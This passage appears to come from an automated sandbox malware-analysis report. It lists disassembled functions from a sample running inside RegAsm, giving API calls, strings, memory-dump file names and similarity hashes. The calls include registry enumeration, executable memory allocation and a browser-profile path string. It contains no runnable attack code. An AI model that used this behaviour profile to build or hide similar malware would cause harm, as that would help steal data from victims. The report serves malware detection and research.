                                                    Function 004126A3 Relevance: 7.6, APIs: 5, Instructions: 84commemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoCreateInstance.OLE32(0042AC28,00000000,00000001,004292EC,00000000,?,?,?,?,004128EF), ref: 004126EA
                                                    • SysAllocString.OLEAUT32(?), ref: 00412700
                                                    • _wtoi64.MSVCRT ref: 0041274D
                                                    • SysFreeString.OLEAUT32(?), ref: 00412771
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0041277A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: String$Free$AllocCreateInstance_wtoi64
                                                    • String ID:
                                                    • API String ID: 1817501562-0
                                                    • Opcode ID: f48b06c7123509e446c0da83949f76becdf3deb21f21affda6d357694f029a8c
                                                    • Instruction ID: 58adf380e0662d1b76d21edb75c8d821cdd3313fccb4f2387b68fcf25dfbec8a
                                                    • Opcode Fuzzy Hash: f48b06c7123509e446c0da83949f76becdf3deb21f21affda6d357694f029a8c
                                                    • Instruction Fuzzy Hash: 2E310575E04219EFCB05DFA9D849BEEBBB4FB08315F00416AE911E32A0C7795951CFA4
                                                    Function 0040F9BD Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040F9EF
                                                    • StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040FA75
                                                    • StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040FB84
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040FC57
                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040FCDD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID: Stable\
                                                    • API String ID: 3722407311-272486606
                                                    • Opcode ID: b1a1266439bdf2a0e8ec9dc9193cdc2636f5054d60504534493cfb04d58e2737
                                                    • Instruction ID: 7cd2c182165b9fee31fd49b72ff1b8ad9c7a36b01791bf89c52de0b726780448
                                                    • Opcode Fuzzy Hash: b1a1266439bdf2a0e8ec9dc9193cdc2636f5054d60504534493cfb04d58e2737
                                                    • Instruction Fuzzy Hash: CD511271A00109ABCF14FBB5DD96BDD77B9BB60304F10402AE906EB1A1EE35DB49CB85
                                                    Function 1FA2FD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNEL32(?,?,?,?,?), ref: 1FA2FE03
                                                    Strings
                                                    • winRead, xrefs: 1FA2FE3D
                                                    • delayed %dms for lock/sharing conflict at line %d, xrefs: 1FA2FE78
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                    • API String ID: 2738559852-1843600136
                                                    • Opcode ID: 8d81df1d26f15456dd64643fa8c9781e48928c5e677bb9d4651ab21bf6ceb7c8
                                                    • Instruction ID: d00554edbefe085214e12dc792ed7c5fc6d9015e6c998a5b79176442e015b8ae
                                                    • Opcode Fuzzy Hash: 8d81df1d26f15456dd64643fa8c9781e48928c5e677bb9d4651ab21bf6ceb7c8
                                                    • Instruction Fuzzy Hash: 7741F372B04345ABC304DF64CD809ABB7E9FF84624FC4092DFA4186641E72DF9198BA2
                                                    Function 00408203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 00408220
                                                    • LoadLibraryA.KERNEL32 ref: 004082A8
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,00428E34,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425200), ref: 00408294
                                                    Strings
                                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00408215, 00408229, 0040823F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                    • API String ID: 2929475105-3463377506
                                                    • Opcode ID: 33191907c34fe30b91932b9d02352948c94fa74ece7802ec8efd6249ff31ed7f
                                                    • Instruction ID: 84292c169819be5b53b0aa043c90a357ac7ef937680942749e622d56a9f64c6e
                                                    • Opcode Fuzzy Hash: 33191907c34fe30b91932b9d02352948c94fa74ece7802ec8efd6249ff31ed7f
                                                    • Instruction Fuzzy Hash: 91413931905245DFEB05EBA1FD66AE937B6FB04305F20612EE901A12F1DF395988CF98
                                                    Function 00412213 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52registrystringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00412259
                                                    • wsprintfA.USER32 ref: 0041228B
                                                    • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 004122AC
                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,000F003F,?,00000400), ref: 0041231A
                                                    • lstrlenA.KERNEL32(?), ref: 0041232F
                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00428E48), ref: 004123C6
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                    • String ID: %s\%s
                                                    • API String ID: 3471882850-4073750446
                                                    • Opcode ID: c05b9aeffa2524c3aa9bcda23acaed7832a6b4e564aa8b15d5e8c89861718145
                                                    • Instruction ID: d7cee1983acf12d4360d724bf4cc3a4c29cf8c0d886bd7a19f0679c37ebee969
                                                    • Opcode Fuzzy Hash: c05b9aeffa2524c3aa9bcda23acaed7832a6b4e564aa8b15d5e8c89861718145
                                                    • Instruction Fuzzy Hash: 1721F27590012CAFEB609B50DD45BD9B7B9FF08304F4094E5E649A60A0CF749AD98F94
                                                    Function 004073D6 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 96memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(;q@,;q@,00003000,00000040), ref: 00407474
                                                    • VirtualAlloc.KERNEL32(00000000,;q@,00003000,00000040), ref: 004074BF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: ;q@$;q@
                                                    • API String ID: 4275171209-3893597124
                                                    • Opcode ID: ce50d067a10a9d200ba21eaef60b552f8d4fc485bf38c75f1e0756368e75d6fe
                                                    • Instruction ID: d3bad8f71399132065eca503ffa06903ce5ef1b7e5e995e1b9bcc650a41b767e
                                                    • Opcode Fuzzy Hash: ce50d067a10a9d200ba21eaef60b552f8d4fc485bf38c75f1e0756368e75d6fe
                                                    • Instruction Fuzzy Hash: D941B535A04209EFCB50CF98C485FADBBF0EB08364F1484A5E959EB391D734EA81CB45
                                                    Function 00418DB9 Relevance: 6.1, APIs: 4, Instructions: 85synchronizationthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                    • CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateObjectOpenSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 4234577939-0
                                                    • Opcode ID: f43b621d675ccc337efc39be0cc282dc91ce5b12264d272aea3fd1cbd3d3afdf
                                                    • Instruction ID: 4c5e3d0133d6e9f2eae60e2625ec9d3b543f1cf41f80d31bea27500df29b833e
                                                    • Opcode Fuzzy Hash: f43b621d675ccc337efc39be0cc282dc91ce5b12264d272aea3fd1cbd3d3afdf
                                                    • Instruction Fuzzy Hash: 4F315C75900208AFDB10EF61DC45BED3BB5BF15305F54412AF9159A1A1EF349A86CF88
                                                    Function 00411EB5 Relevance: 6.0, APIs: 4, Instructions: 32memoryregistryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00411EC9
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411ED0
                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000), ref: 00411EEF
                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,000000FF,000000FF), ref: 00411F0D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                    • String ID:
                                                    • API String ID: 3676486918-0
                                                    • Opcode ID: dd008c8d00355dc8994383d20b0c3b1a5372c3a3245a183f1dace59f39d50ce9
                                                    • Instruction ID: 2ba135963ef3e1c949db86b07d2e2a79437377d0b90cfecc595d9e25d7200812
                                                    • Opcode Fuzzy Hash: dd008c8d00355dc8994383d20b0c3b1a5372c3a3245a183f1dace59f39d50ce9
                                                    • Instruction Fuzzy Hash: C2F03A79A40208FFEB10AFE0EC0AF9DBBBAFB06745F105064F701A91A0D77156949F40
                                                    Function 004070D4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ez@
                                                    • API String ID: 0-307298357
                                                    • Opcode ID: 3bbf64017ccec70b43ef0a4a85a6baf18d8732ef2f27285e686f093308f930eb
                                                    • Instruction ID: a860d7bb49b00275ae4f9f6a4a51eaec01057512aeaaa0d5d6857e8719e4b74b
                                                    • Opcode Fuzzy Hash: 3bbf64017ccec70b43ef0a4a85a6baf18d8732ef2f27285e686f093308f930eb
                                                    • Instruction Fuzzy Hash: FA61D270C08209EFCF14DF94D948BEEB7B0AB04315F2044AAE405B7291D779AE94DF6A
                                                    Function 00418C65 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenA.KERNEL32(00000000), ref: 00418C99
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00418D4B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
